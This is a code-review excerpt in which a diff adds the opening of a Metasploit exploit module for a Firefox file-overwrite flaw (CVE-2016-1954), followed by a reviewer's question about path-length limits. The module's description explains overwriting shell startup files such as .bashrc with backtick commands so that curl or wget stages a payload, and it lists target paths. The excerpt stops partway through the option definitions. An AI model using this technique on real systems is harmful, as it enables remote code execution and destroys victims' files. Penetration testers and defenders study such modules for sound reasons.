modules/exploits/multi/browser/firefox_report_uri_file_overwrite.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  # You have to guess the logged-in user's name.
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Firefox report-uri File Overwrite',
+      'Description' => %q{
+        This module abuses an arbitrary file write vulnerability in Firefox < 45.0
+        to plant a .bashrc (or similar) file on the victim, ultimately resulting in
+        a shell. The exploit causes a file to be written to the path of your choice
+        containing backticks ` that allow us to execute shell commands. A curl or
+        wget binary on the system is then used to stage a metasploit payload.
+
+        For this module to work, you must know or guess (up to a few hundred tries)
+        the username of the logged in user. Some good paths to try are:
+
+        /home/user/.profile,
+        /home/user/.bashrc,
+        /home/user/.zshrc,
+        /home/user/.bash_aliases,
+        /home/user/.login,
+        /var/root/.profile,
+        /var/root/.login
+
+        As a warning, this module is fairly destructive and will attempt to overwrite
+        any paths specified in FILES and eventually erase them. Use with caution.
+      },
+      'Author'         => [
+        'Nicolas Golubovic', # vuln discoverer
+        'evo'
+      ],
+      'License'     => MSF_LICENSE,
+      'Arch'           => [ARCH_CMD],
+      'Targets'        => [ ['Automatic', {}] ],
+      'Platform'      => %w{ linux osx solaris unix },
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PrependFork' => true },
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DisclosureDate' => 'Mar 8 2016',
+      'References' => [
+        ['URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-17/'],
+        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1243178'],
+        ['CVE', '2016-1954']
+      ]
+    ))
+
+    register_options([
+      OptString.new('FILES', [
+        true,
+        'List of file paths to write shell script to',
+        '/home/ubuntu/.login'
+      ]),
+      OptString.new('URIPATH', [
+        true,
+        'Path to the exploit. This needs to be "/" for space purposes.',
```

Comment:
What are the space restrictions here? Do these apply to this module, or did it come from somewhere else.